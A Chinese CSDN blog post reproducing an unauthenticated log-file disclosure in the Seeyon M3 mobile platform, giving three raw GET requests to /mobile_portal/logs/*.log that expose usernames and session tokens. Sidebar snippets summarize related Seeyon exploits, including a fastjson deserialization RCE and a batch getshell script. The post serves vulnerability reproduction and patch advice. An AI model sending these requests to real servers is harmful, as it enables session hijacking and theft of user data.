致远M3 log 敏感信息泄露漏洞

于 2024-05-08 10:14:03 发布
阅读量511 收藏 3
点赞数 12
文章标签: 渗透 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138561141
版权

文章目录

免责

只为学习与交流,若利用做一切违法乱纪的事与本人无关

漏洞描述

致远M3是一个企业移动业务管理平台,全面覆盖各种工作场景,通过智能化的办公和业务场景融合,为企业构建新一代的移动智能工作方式

漏洞原理

/mobile_portal/logs/autoLogin.log
/mobile_portal/logs/app.log
/mobile_portal/logs/requset.log
接口处存在存在信息泄露

影响版本

不详

漏洞复现

在这里插入图片描述
进行访问泄露接口

GET /mobile_portal/logs/autoLogin.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

在这里插入图片描述
可以看到session泄露

GET /mobile_portal/logs/app.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

在这里插入图片描述

GET /mobile_portal/logs/requset.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 2

在这里插入图片描述

修复方法

官方已更新补丁,请升级至最新版本。

抠脚大汉在网络
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
致远M3 反序列化RCE漏洞复现(XVE-2023-24878)
0xSec
11-24 5171
致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远M3 Session 敏感信息泄露漏洞复现
0xSec
05-07 952
致远M3 server多个日志文件存在敏感信息泄露漏洞,允许未经身份验证的远程攻击者访问日志文件,泄露了登陆用户名及session等敏感信息,使系统处于极不安全的状态。
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
weixin_43167326的博客
05-07 1028
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息
(1day)致远M3 log 敏感信息泄露漏洞(Session)复现
最新发布
weixin_72543266的博客
05-08 1168
系统学习web漏洞挖掘以及项目实战也有一段时间了,发现在漏洞挖掘过程中难免会碰到一些历史漏洞,来帮助自己或是提高自己挖洞和及时发现漏洞效率,于是开始创建这个专栏,对第一时间发现的1day以及历史漏洞进行复现,来让自己更加熟悉漏洞类型以及历史漏洞,方便自己在后续的项目实战中,碰到漏洞能够及时去查询和复现.
致远OA敏感信息泄露漏洞合集(含批量检测POC)
今天是几号的博客
03-21 7705
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
致远M3-server反序列化RCE-未公开Day漏洞复现
weixin_43167326的博客
01-22 644
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
漏洞复现--致远 M3 反序列化 mobile_portal RCE
qq_53003652的博客
11-27 3759
M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口。严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。使用ysoserial生成CB链TomcatCmdEcho回显内存马。利用CB1链生成hex代码,替换POC中的HEX。执行命令,在请求内容加上cmd执行命令回显。致远M3 server。成功执行ping命令。
fbion#PeiQi-WIKI-POC#致远OA A6 DownExcelBeanServlet 用户敏感信息泄露1
07-25
致远OA A6 DownExcelBeanServlet 用户敏感信息泄露漏洞描述致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息漏洞
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
致远 M3 移动协同软件V3.1.0(A8+集团版)用户操作手册.pdf
03-08
致远软件推出的 “致远 M3 移动协同软件(简称:M3)”产品 ,是一款基于智能移动 手持设备客户端的革命性高效管理软件。 通过针对精英人士量身打造的应用功能,您可以在任何时间、任何地点高效、快捷的实 现管理...
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
04-08
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
致远M3移动协同软件V4.1用户操作手册(企业版).doc
06-21
致远M3移动协同软件V4.1用户操作手册
seeyonAjaxGetshell:致远OA seeyon未授权漏洞批量getshell
05-28
致远OAseeyon未授权漏洞+文件上传批量getshell 抄借鉴tools论坛大佬的payload写了个批量拿shell的脚本。 Note: 为了方便(懒比)直接调用curl,因此请在Linux下运行。 ip.txt --> 待检测IP shell.txt --> shell...
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
致远A8-V5用户操作手册.PDF
07-05
致远A8-V5用户操作手册官方文档,介绍很详细,很实用,需要的自行下载。
致远M3-server 反序列化RCE漏洞
m0_71285176的博客
01-10 1338
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远OA A8 status.jsp 信息泄露POC批量验证
布啦啦
03-22 554
漏洞名称:致远OA A8 status.jsp 信息泄露
反序列化漏洞详解
qq_48904485的博客
03-21 2827
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
致远oa a6 用户敏感信息泄露
09-27
致远OA A6用户敏感信息泄露事件是一个严重的安全漏洞,给用户的隐私和数据安全造成了重大威胁。根据目前的报道和了解,此漏洞可能使黑客能够非法访问用户的敏感信息,对用户的个人隐私和公司数据造成不可挽回的损失。 首先,对于致远OA A6开发团队,他们在设计和开发该系统时应该更加关注数据安全性的重要性。现在的网络环境十分复杂,黑客的技术也日益先进,软件系统的安全性是非常重要的。在开发过程中,应该严格遵循安全性最佳实践和标准,确保用户的敏感信息得到妥善保护。 其次,致远OA A6的用户也需要加强自己的信息安全意识和保护措施。用户在使用该系统的过程中应该遵循密码安全原则,选择复杂的密码,并定期更改密码,避免使用相同的密码用于不同的账户。同时,用户也应该定期备份重要的数据,以防信息泄露引发的数据丢失问题。 另外,致远OA A6的运营商和监管部门需要对事件进行调查和追责。运营商应该向用户公开事件的处理进展和安全修复方案,积极与用户沟通,以减少不必要的损失。监管部门也需要就此事件进行调查,确保类似的安全漏洞不再发生,并对漏洞导致的数据泄露进行相应的处罚。 最后,致远OA A6用户敏感信息泄露事件的处理需要全面合作,涉及到开发者、用户、运营商和监管部门的共同努力和责任。只有通过加强安全意识和采取相应的防护措施,才能避免类似事件再次发生,确保用户的信息安全和隐私得到最大程度的保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值